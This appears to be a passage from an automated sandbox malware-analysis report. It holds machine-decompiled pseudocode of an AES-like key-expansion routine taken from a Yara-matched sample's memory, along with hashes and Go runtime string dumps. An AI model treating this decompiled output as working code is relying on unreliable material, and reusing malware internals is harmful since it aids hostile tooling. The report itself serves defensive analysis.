                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_$casgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorresetspinnin$casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unex$runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNor
                                                                                                                            • API String ID: 0-3782697299
                                                                                                                            • Opcode ID: 8ddc95c8b6f3c4def2a011be4e87d4b9a5b52e39dc0a574bcecad35db63f1e98
                                                                                                                            • Instruction ID: c9612337a39e22b6dc421ddb254cc91f855ead8b2bf6a6845ff5a528a89a0b3b
                                                                                                                            • Opcode Fuzzy Hash: 8ddc95c8b6f3c4def2a011be4e87d4b9a5b52e39dc0a574bcecad35db63f1e98
                                                                                                                            • Instruction Fuzzy Hash: 45A1C236705B85C6EB04CB29E48439EBB61F39AB98F448222EF9D43B65DF39C545CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0000025B25BF8A86190(intOrPtr __edx, void* __edi, void* __esp, void* __rax, long long __rcx, long long __r9, intOrPtr _a4, long long _a8, intOrPtr _a12, intOrPtr _a16, signed long long _a20, intOrPtr _a24, long long _a32) {
                                                                                                                            				signed long long _v4;
                                                                                                                            				signed long long _v28;
                                                                                                                            				signed long long _v36;
                                                                                                                            				signed long long _v44;
                                                                                                                            				signed long long _v52;
                                                                                                                            				void* _v60;
                                                                                                                            				signed long long _v68;
                                                                                                                            				intOrPtr _v76;
                                                                                                                            				signed int _v80;
                                                                                                                            				signed long long _v84;
                                                                                                                            				signed int _t498;
                                                                                                                            				signed int _t528;
                                                                                                                            				signed int _t578;
                                                                                                                            				signed int _t595;
                                                                                                                            				signed long long _t894;
                                                                                                                            				signed long long _t895;
                                                                                                                            				signed long long _t896;
                                                                                                                            				signed long long _t897;
                                                                                                                            				signed long long _t898;
                                                                                                                            				signed long long _t899;
                                                                                                                            				signed long long _t900;
                                                                                                                            				signed long long _t901;
                                                                                                                            				signed long long _t902;
                                                                                                                            				signed long long _t905;
                                                                                                                            				signed long long _t906;
                                                                                                                            				signed long long _t910;
                                                                                                                            				signed long long _t911;
                                                                                                                            				signed long long _t912;
                                                                                                                            				signed long long _t913;
                                                                                                                            				signed long long _t914;
                                                                                                                            				signed long long _t915;
                                                                                                                            				signed long long _t918;
                                                                                                                            				signed long long _t919;
                                                                                                                            				signed long long _t920;
                                                                                                                            				signed long long _t921;
                                                                                                                            				signed long long _t925;
                                                                                                                            				signed long long _t926;
                                                                                                                            				signed long long _t927;
                                                                                                                            				signed long long _t928;
                                                                                                                            				signed long long _t929;
                                                                                                                            				signed long long _t930;
                                                                                                                            				signed long long _t931;
                                                                                                                            				signed long long _t932;
                                                                                                                            				signed long long _t933;
                                                                                                                            				signed long long _t965;
                                                                                                                            				signed long long _t966;
                                                                                                                            				signed long long _t967;
                                                                                                                            				signed long long _t968;
                                                                                                                            				signed long long _t969;
                                                                                                                            				signed long long _t973;
                                                                                                                            				signed long long _t974;
                                                                                                                            				signed long long _t978;
                                                                                                                            				signed long long _t979;
                                                                                                                            				signed long long _t983;
                                                                                                                            				signed long long _t984;
                                                                                                                            				signed long long _t988;
                                                                                                                            				signed long long _t989;
                                                                                                                            				signed long long _t995;
                                                                                                                            				signed long long _t996;
                                                                                                                            				signed long long _t997;
                                                                                                                            				signed long long _t998;
                                                                                                                            				signed long long _t999;
                                                                                                                            				signed long long _t1000;
                                                                                                                            				signed long long _t1003;
                                                                                                                            				signed long long _t1004;
                                                                                                                            				signed long long _t1008;
                                                                                                                            				signed long long _t1009;
                                                                                                                            				signed long long _t1017;
                                                                                                                            				signed long long _t1018;
                                                                                                                            				signed long long _t1019;
                                                                                                                            				signed long long _t1020;
                                                                                                                            				signed long long _t1021;
                                                                                                                            				signed long long _t1022;
                                                                                                                            				signed long long _t1023;
                                                                                                                            				signed long long _t1024;
                                                                                                                            				signed long long _t1025;
                                                                                                                            				signed long long _t1026;
                                                                                                                            				signed long long _t1029;
                                                                                                                            				signed long long _t1030;
                                                                                                                            				signed long long _t1034;
                                                                                                                            				signed long long _t1035;
                                                                                                                            				signed long long _t1039;
                                                                                                                            				signed long long _t1040;
                                                                                                                            				signed long long _t1044;
                                                                                                                            				signed long long _t1045;
                                                                                                                            				signed long long _t1053;
                                                                                                                            				signed long long _t1054;
                                                                                                                            				signed long long _t1055;
                                                                                                                            				signed long long _t1056;
                                                                                                                            				signed long long _t1057;
                                                                                                                            				signed long long _t1058;
                                                                                                                            				signed long long _t1062;
                                                                                                                            				signed long long _t1063;
                                                                                                                            				signed long long _t1064;
                                                                                                                            				signed long long _t1065;
                                                                                                                            				signed long long _t1066;
                                                                                                                            				signed long long _t1067;
                                                                                                                            				signed long long _t1168;
                                                                                                                            				signed long long _t1171;
                                                                                                                            				signed long long _t1174;
                                                                                                                            
                                                                                                                            				_a32 = __r9;
                                                                                                                            				_a24 = r8d;
                                                                                                                            				_a16 = __edx;
                                                                                                                            				_a8 = __rcx;
                                                                                                                            				memset(__edi, 0xcccccccc, 0x18 << 2);
                                                                                                                            				if (_a4 == 0x10) goto 0xf8a861db;
                                                                                                                            				if (_a4 == 0x18) goto 0xf8a861db;
                                                                                                                            				if (_a4 == 0x20) goto 0xf8a861db;
                                                                                                                            				goto 0xf8a87048;
                                                                                                                            				if (_a12 == 0) goto 0xf8a86209;
                                                                                                                            				asm("cdq");
                                                                                                                            				if (_a12 == __rax + __rax + 6) goto 0xf8a86209;
                                                                                                                            				goto 0xf8a87048;
                                                                                                                            				asm("cdq");
                                                                                                                            				 *((intOrPtr*)(_a20 + 0x1e0)) = __rax + __rax + 6;
                                                                                                                            				_v84 = 0;
                                                                                                                            				_t894 = _a20;
                                                                                                                            				_v68 = _t894;
                                                                                                                            				_t895 = _t894 * 0;
                                                                                                                            				_t973 = _v4;
                                                                                                                            				_t974 = _t973;
                                                                                                                            				 *(_v68 + _t974 * 2 * 3 * 0) = ( *(_t973 + _t895) & 0xff) << 0x00000018 | ( *(_v4 + _t974) & 0xff) << 0x00000010 | ( *(_v4 + _t974 * 2) & 0xff) << 0x00000008 |  *(_v4 + _t974 * 2 * 3) & 0xff;
                                                                                                                            				_t896 = _t895 * 0;
                                                                                                                            				_t978 = _v4;
                                                                                                                            				_t979 = _t978;
                                                                                                                            				 *(_v68 + _t979 * 2 * 3) = ( *(_t978 + _t896 + 4) & 0xff) << 0x00000018 | ( *(_v4 + _t979 + 4) & 0xff) << 0x00000010 | ( *(_v4 + 4 + _t979 * 2) & 0xff) << 0x00000008 |  *(_v4 + 4 + _t979 * 2 * 3) & 0xff;
                                                                                                                            				_t897 = _t896 * 0;
                                                                                                                            				_t983 = _v4;
                                                                                                                            				_t984 = _t983;
                                                                                                                            				 *(_v68 + _t984 * 2 * 3 * 2) = ( *(_t983 + _t897 + 8) & 0xff) << 0x00000018 | ( *(_v4 + _t984 + 8) & 0xff) << 0x00000010 | ( *(_v4 + 8 + _t984 * 2) & 0xff) << 0x00000008 |  *(_v4 + 8 + _t984 * 2 * 3) & 0xff;
                                                                                                                            				_t898 = _t897 * 0;
                                                                                                                            				_t988 = _v4;
                                                                                                                            				_t989 = _t988;
                                                                                                                            				 *(_v68 + _t989 * 2 * 3 * 3) = ( *(_t988 + _t898 + 0xc) & 0xff) << 0x00000018 | ( *(_v4 + _t989 + 0xc) & 0xff) << 0x00000010 | ( *(_v4 + 0xc + _t989 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0xc + _t989 * 2 * 3) & 0xff;
                                                                                                                            				if (_a4 != 0x10) goto 0xf8a86582;
                                                                                                                            				_v80 = 0x2c;
                                                                                                                            				_t899 = _t898 * 3;
                                                                                                                            				_v76 =  *((intOrPtr*)(_v68 + _t899));
                                                                                                                            				_t900 = _t899 * 0;
                                                                                                                            				_v52 = _t900;
                                                                                                                            				_t498 = E0000025B25BF8A88770(_v76, _t900, _v68);
                                                                                                                            				_t995 = _v84;
                                                                                                                            				_t996 = _t995 * 4;
                                                                                                                            				 *(_v68 + _t996) =  *(_v68 + _v52) ^ _t498 ^  *("Changing the code in this way will not affect the quality of the resulting optimized code.\n\r" + _t995 * 4);
                                                                                                                            				_t901 = _t900;
                                                                                                                            				_t997 = _t996 * 4;
                                                                                                                            				_t998 = _t997 * 5;
                                                                                                                            				 *(_v68 + _t998) =  *(_v68 + _t901) ^  *(_v68 + _t997);
                                                                                                                            				_t902 = _t901 * 2;
                                                                                                                            				_t999 = _t998 * 5;
                                                                                                                            				_t1000 = _t999 * 6;
                                                                                                                            				 *(_v68 + _t1000) =  *(_v68 + _t902) ^  *(_v68 + _t999);
                                                                                                                            				 *(_v68 + _t1000 * 6 * 7) =  *(_v68 + _t902 * 3) ^  *(_v68 + _t1000 * 6);
                                                                                                                            				_v84 = _v84 + 1;
                                                                                                                            				if (_v84 != 0xa) goto 0xf8a8656a;
                                                                                                                            				goto 0xf8a8657d;
                                                                                                                            				_t905 = _v68 + 0x10;
                                                                                                                            				_v68 = _t905;
                                                                                                                            				goto 0xf8a86458;
                                                                                                                            				goto 0xf8a86c9b;
                                                                                                                            				if (_a4 != 0x18) goto 0xf8a86843;
                                                                                                                            				_v80 = 0x34;
                                                                                                                            				_t906 = _t905 * 0;
                                                                                                                            				_t1003 = _v4;
                                                                                                                            				_t1004 = _t1003;
                                                                                                                            				 *(_v68 + _t1004 * 2 * 3 * 4) = ( *(_t1003 + _t906 + 0x10) & 0xff) << 0x00000018 | ( *(_v4 + _t1004 + 0x10) & 0xff) << 0x00000010 | ( *(_v4 + 0x10 + _t1004 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x10 + _t1004 * 2 * 3) & 0xff;
                                                                                                                            				_t1008 = _v4;
                                                                                                                            				_t1009 = _t1008;
                                                                                                                            				 *(_v68 + _t1009 * 2 * 3 * 5) = ( *(_t1008 + 0x14 + _t906 * 0) & 0xff) << 0x00000018 | ( *(_v4 + _t1009 + 0x14) & 0xff) << 0x00000010 | ( *(_v4 + 0x14 + _t1009 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x14 + _t1009 * 2 * 3) & 0xff;
                                                                                                                            				_t910 = _v68 - _a20 >> 2;
                                                                                                                            				_v76 =  *((intOrPtr*)(_a20 + 0x14 + _t910 * 4));
                                                                                                                            				_t911 = _t910 * 0;
                                                                                                                            				_v44 = _t911;
                                                                                                                            				_t528 = E0000025B25BF8A88770(_v76, _t911, _v68);
                                                                                                                            				_t1017 = _v84;
                                                                                                                            				_t1018 = _t1017 * 6;
                                                                                                                            				 *(_v68 + _t1018) =  *(_v68 + _v44) ^ _t528 ^  *("Changing the code in this way will not affect the quality of the resulting optimized code.\n\r" + _t1017 * 4);
                                                                                                                            				_t912 = _t911;
                                                                                                                            				_t1019 = _t1018 * 6;
                                                                                                                            				_t1020 = _t1019 * 7;
                                                                                                                            				 *(_v68 + _t1020) =  *(_v68 + _t912) ^  *(_v68 + _t1019);
                                                                                                                            				_t913 = _t912 * 2;
                                                                                                                            				_t1021 = _t1020 * 7;
                                                                                                                            				_t1022 = _t1021 * 8;
                                                                                                                            				 *(_v68 + _t1022) =  *(_v68 + _t913) ^  *(_v68 + _t1021);
                                                                                                                            				_t914 = _t913 * 3;
                                                                                                                            				_t1023 = _t1022 * 8;
                                                                                                                            				_t1024 = _t1023 * 9;
                                                                                                                            				 *(_v68 + _t1024) =  *(_v68 + _t914) ^  *(_v68 + _t1023);
                                                                                                                            				_v84 = _v84 + 1;
                                                                                                                            				if (_v84 != 8) goto 0xf8a867bf;
                                                                                                                            				goto 0xf8a8683e;
                                                                                                                            				_t915 = _t914 * 4;
                                                                                                                            				_t1025 = _t1024 * 9;
                                                                                                                            				_t1026 = _t1025 * 0xa;
                                                                                                                            				 *(_v68 + _t1026) =  *(_v68 + _t915) ^  *(_v68 + _t1025);
                                                                                                                            				 *(_v68 + _t1026 * 0xa * 0xb) =  *(_v68 + _t915 * 5) ^  *(_v68 + _t1026 * 0xa);
                                                                                                                            				_t918 = _v68 + 0x18;
                                                                                                                            				_v68 = _t918;
                                                                                                                            				goto 0xf8a8669b;
                                                                                                                            				goto 0xf8a86c9b;
                                                                                                                            				if (_a4 != 0x20) goto 0xf8a86c91;
                                                                                                                            				_v80 = 0x3c;
                                                                                                                            				_t919 = _t918 * 0;
                                                                                                                            				_t1029 = _v4;
                                                                                                                            				_t1030 = _t1029;
                                                                                                                            				 *(_v68 + _t1030 * 2 * 3 * 4) = ( *(_t1029 + _t919 + 0x10) & 0xff) << 0x00000018 | ( *(_v4 + _t1030 + 0x10) & 0xff) << 0x00000010 | ( *(_v4 + 0x10 + _t1030 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x10 + _t1030 * 2 * 3) & 0xff;
                                                                                                                            				_t920 = _t919 * 0;
                                                                                                                            				_t1034 = _v4;
                                                                                                                            				_t1035 = _t1034;
                                                                                                                            				 *(_v68 + _t1035 * 2 * 3 * 5) = ( *(_t1034 + _t920 + 0x14) & 0xff) << 0x00000018 | ( *(_v4 + _t1035 + 0x14) & 0xff) << 0x00000010 | ( *(_v4 + 0x14 + _t1035 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x14 + _t1035 * 2 * 3) & 0xff;
                                                                                                                            				_t921 = _t920 * 0;
                                                                                                                            				_t1039 = _v4;
                                                                                                                            				_t1040 = _t1039;
                                                                                                                            				 *(_v68 + _t1040 * 2 * 3 * 6) = ( *(_t1039 + _t921 + 0x18) & 0xff) << 0x00000018 | ( *(_v4 + _t1040 + 0x18) & 0xff) << 0x00000010 | ( *(_v4 + 0x18 + _t1040 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x18 + _t1040 * 2 * 3) & 0xff;
                                                                                                                            				_t1044 = _v4;
                                                                                                                            				_t1045 = _t1044;
                                                                                                                            				 *(_v68 + _t1045 * 2 * 3 * 7) = ( *(_t1044 + 0x1c + _t921 * 0) & 0xff) << 0x00000018 | ( *(_v4 + _t1045 + 0x1c) & 0xff) << 0x00000010 | ( *(_v4 + 0x1c + _t1045 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x1c + _t1045 * 2 * 3) & 0xff;
                                                                                                                            				_t925 = _v68 - _a20 >> 2;
                                                                                                                            				_v76 =  *((intOrPtr*)(_a20 + 0x1c + _t925 * 4));
                                                                                                                            				_t926 = _t925 * 0;
                                                                                                                            				_v36 = _t926;
                                                                                                                            				_t578 = E0000025B25BF8A88770(_v76, _t926, _v68);
                                                                                                                            				_t1053 = _v84;
                                                                                                                            				_t1054 = _t1053 * 8;
                                                                                                                            				 *(_v68 + _t1054) =  *(_v68 + _v36) ^ _t578 ^  *("Changing the code in this way will not affect the quality of the resulting optimized code.\n\r" + _t1053 * 4);
                                                                                                                            				_t927 = _t926;
                                                                                                                            				_t1055 = _t1054 * 8;
                                                                                                                            				_t1056 = _t1055 * 9;
                                                                                                                            				 *(_v68 + _t1056) =  *(_v68 + _t927) ^  *(_v68 + _t1055);
                                                                                                                            				_t928 = _t927 * 2;
                                                                                                                            				_t1057 = _t1056 * 9;
                                                                                                                            				_t1058 = _t1057 * 0xa;
                                                                                                                            				 *(_v68 + _t1058) =  *(_v68 + _t928) ^  *(_v68 + _t1057);
                                                                                                                            				_t929 = _t928 * 3;
                                                                                                                            				 *(_v68 + _t1058 * 0xa * 0xb) =  *(_v68 + _t929) ^  *(_v68 + _t1058 * 0xa);
                                                                                                                            				_v84 = _v84 + 1;
                                                                                                                            				if (_v84 != 7) goto 0xf8a86b89;
                                                                                                                            				goto 0xf8a86c8f;
                                                                                                                            				_t930 = _t929 * 0xb;
                                                                                                                            				_v76 =  *((intOrPtr*)(_v68 + _t930));
                                                                                                                            				_t931 = _t930 * 4;
                                                                                                                            				_v28 = _t931;
                                                                                                                            				asm("ror ecx, 0x8");
                                                                                                                            				_t595 = E0000025B25BF8A88770(_v76, _t931, _v68);
                                                                                                                            				_t1062 = _v68;
                                                                                                                            				_t1063 = _t1062 * 0xc;
                                                                                                                            				 *(_v68 + _t1063) =  *(_t1062 + _v28) ^ _t595;
                                                                                                                            				_t932 = _t931 * 5;
                                                                                                                            				_t1064 = _t1063 * 0xc;
                                                                                                                            				_t1065 = _t1064 * 0xd;
                                                                                                                            				 *(_v68 + _t1065) =  *(_v68 + _t932) ^  *(_v68 + _t1064);
                                                                                                                            				_t933 = _t932 * 6;
                                                                                                                            				_t1066 = _t1065 * 0xd;
                                                                                                                            				_t1067 = _t1066 * 0xe;
                                                                                                                            				 *(_v68 + _t1067) =  *(_v68 + _t933) ^  *(_v68 + _t1066);
                                                                                                                            				_t1165 = _v68;
                                                                                                                            				 *(_t1165 + _t1067 * 0xe * 0xf) =  *(_v68 + _t933 * 7) ^  *(_v68 + _t1067 * 0xe);
                                                                                                                            				_v68 = _v68 + 0x20;
                                                                                                                            				goto 0xf8a86a62;
                                                                                                                            				goto 0xf8a86c9b;
                                                                                                                            				goto 0xf8a87048;
                                                                                                                            				_v68 = _a20 + 0xf0;
                                                                                                                            				_v60 = _a20 + _v80 * 4 - 0x10;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				_v68 = _v68 - 0xc;
                                                                                                                            				_v60 = _v60 - 0xc;
                                                                                                                            				_v84 = 1;
                                                                                                                            				_v84 = _v84 + 1;
                                                                                                                            				if (_v84 -  *((intOrPtr*)(_a20 + 0x1e0)) >= 0) goto 0xf8a86f9e;
                                                                                                                            				_v60 = _v60 - 0x10;
                                                                                                                            				_t965 = _v68 + 0x10;
                                                                                                                            				_v68 = _t965;
                                                                                                                            				_t966 = _t965 * 0;
                                                                                                                            				_v76 =  *((intOrPtr*)(_v60 + _t966));
                                                                                                                            				_t1168 = _v68;
                                                                                                                            				 *_t1168 =  *(0xf8a957a0 + _t966 * 4) ^  *(0xf8a95ba0 + _t1165 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				_t967 = _t966;
                                                                                                                            				_v76 =  *((intOrPtr*)(_v60 + _t967));
                                                                                                                            				_t1171 = _v68;
                                                                                                                            				 *(_t1171 + 0x25bf8a957a0) =  *(0xf8a957a0 + _t967 * 4) ^  *(0xf8a95ba0 + _t1168 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				_t968 = _t967 * 2;
                                                                                                                            				_v76 =  *((intOrPtr*)(_v60 + _t968));
                                                                                                                            				_t1174 = _v68;
                                                                                                                            				 *(_t1174 + 0x4b7f152af40) =  *(0xf8a957a0 + _t968 * 4) ^  *(0xf8a95ba0 + _t1171 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				_t969 = _t968 * 3;
                                                                                                                            				_v76 =  *((intOrPtr*)(_v60 + _t969));
                                                                                                                            				_t1165 = _v68;
                                                                                                                            				 *(_v68 + 0x713e9fc06e0) =  *(0xf8a957a0 + _t969 * 4) ^  *(0xf8a95ba0 + _t1174 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				goto L1;
                                                                                                                            				_v60 = _v60 - 0x10;
                                                                                                                            				_v60 = _v60 - 0x10;
                                                                                                                            				_v68 = _v68 + 0x10;
                                                                                                                            				_v68 = _v68 + 0x10;
                                                                                                                            				__rax = _v68;
                                                                                                                            				__rcx = _v60;
                                                                                                                            				__ecx =  *_v60;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				__rax = _v68;
                                                                                                                            				__rcx = _v60;
                                                                                                                            				__ecx =  *_v60;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				__rax = _v68;
                                                                                                                            				__rcx = _v60;
                                                                                                                            				__ecx =  *_v60;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v68 = _v68 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				_v60 = _v60 + 4;
                                                                                                                            				__rax = _v68;
                                                                                                                            				__rcx = _v60;
                                                                                                                            				__ecx =  *_v60;
                                                                                                                            				 *_v68 =  *_v60;
                                                                                                                            				__rsp = __rsp + 0x60;
                                                                                                                            				return 0;
                                                                                                                            			}
                                                                                                                            0x25bf8a86f25
                                                                                                                            0x25bf8a86f31
                                                                                                                            0x25bf8a86f91
                                                                                                                            0x25bf8a86f96
                                                                                                                            0x25bf8a86f99
                                                                                                                            0x25bf8a86fa3
                                                                                                                            0x25bf8a86fa7
                                                                                                                            0x25bf8a86fb1
                                                                                                                            0x25bf8a86fb5
                                                                                                                            0x25bf8a86fba
                                                                                                                            0x25bf8a86fbf
                                                                                                                            0x25bf8a86fc4
                                                                                                                            0x25bf8a86fc6
                                                                                                                            0x25bf8a86fcd
                                                                                                                            0x25bf8a86fd1
                                                                                                                            0x25bf8a86fdb
                                                                                                                            0x25bf8a86fdf
                                                                                                                            0x25bf8a86fe4
                                                                                                                            0x25bf8a86fe9
                                                                                                                            0x25bf8a86fee
                                                                                                                            0x25bf8a86ff0
                                                                                                                            0x25bf8a86ff7
                                                                                                                            0x25bf8a86ffb
                                                                                                                            0x25bf8a87005
                                                                                                                            0x25bf8a87009
                                                                                                                            0x25bf8a8700e
                                                                                                                            0x25bf8a87013
                                                                                                                            0x25bf8a87018
                                                                                                                            0x25bf8a8701a
                                                                                                                            0x25bf8a87021
                                                                                                                            0x25bf8a87025
                                                                                                                            0x25bf8a8702f
                                                                                                                            0x25bf8a87033
                                                                                                                            0x25bf8a87038
                                                                                                                            0x25bf8a8703d
                                                                                                                            0x25bf8a87042
                                                                                                                            0x25bf8a87044
                                                                                                                            0x25bf8a87048
                                                                                                                            0x25bf8a8704d

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $<$Changing the code in this way will not affect the quality of the resulting optimized code.
                                                                                                                            • API String ID: 0-1227851518
                                                                                                                            • Opcode ID: b87a5cde6e5a4077ad07fe7312a0047c8e78c2eb291cf124416320b341590277
                                                                                                                            • Instruction ID: 5fef58ab8b620c7275eb01b683d71b9c6ce5da88d29564f7a6e82e64ff632a0f
                                                                                                                            • Opcode Fuzzy Hash: b87a5cde6e5a4077ad07fe7312a0047c8e78c2eb291cf124416320b341590277
                                                                                                                            • Instruction Fuzzy Hash: 5092E1B2329A8087DB58CB1DE4A573AB7A1F3C8B84F54512AF79B87794CA3CC451CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 01304486
                                                                                                                            • chansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: invalid p stateremaining , xrefs: 01304462
                                                                                                                            • unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta, xrefs: 01303FA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b$chansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: invalid p stateremaining $unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta
                                                                                                                            • API String ID: 0-1882019176
                                                                                                                            • Opcode ID: 795441b1299711dbf14235fdac2fdff8bd957df93b37b3807bdbf86b755ed247
                                                                                                                            • Instruction ID: 60d9bb1a3508004e81eec5034edd4f7bda3620dc8d50fc98c71639a3aa4f1f8a
                                                                                                                            • Opcode Fuzzy Hash: 795441b1299711dbf14235fdac2fdff8bd957df93b37b3807bdbf86b755ed247
                                                                                                                            • Instruction Fuzzy Hash: 55F1DE72204B84C6D751DB2AE45039ABBA5F395BE8F549225CF9C57BE9CF38C188C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ycasgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on , xrefs: 0132EA6E
                                                                                                                            • runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done, xrefs: 0132EA93
                                                                                                                            • self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.n, xrefs: 0132EAA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ycasgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on $runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done$self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.n
                                                                                                                            • API String ID: 0-4222696518
                                                                                                                            • Opcode ID: 9e6dd5e231a23a3957b388778db7320557d9b485e376df7a2c0f83d87a2d1558
                                                                                                                            • Instruction ID: 9013819d2faca232429a8229ee7cbd8aa88b5ea3c33a6f82cf064d0b766e7664
                                                                                                                            • Opcode Fuzzy Hash: 9e6dd5e231a23a3957b388778db7320557d9b485e376df7a2c0f83d87a2d1558
                                                                                                                            • Instruction Fuzzy Hash: F7C16036605F9081D765DF29E4913AAB764F789BA8F449236DF9C877A5CF38C081CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
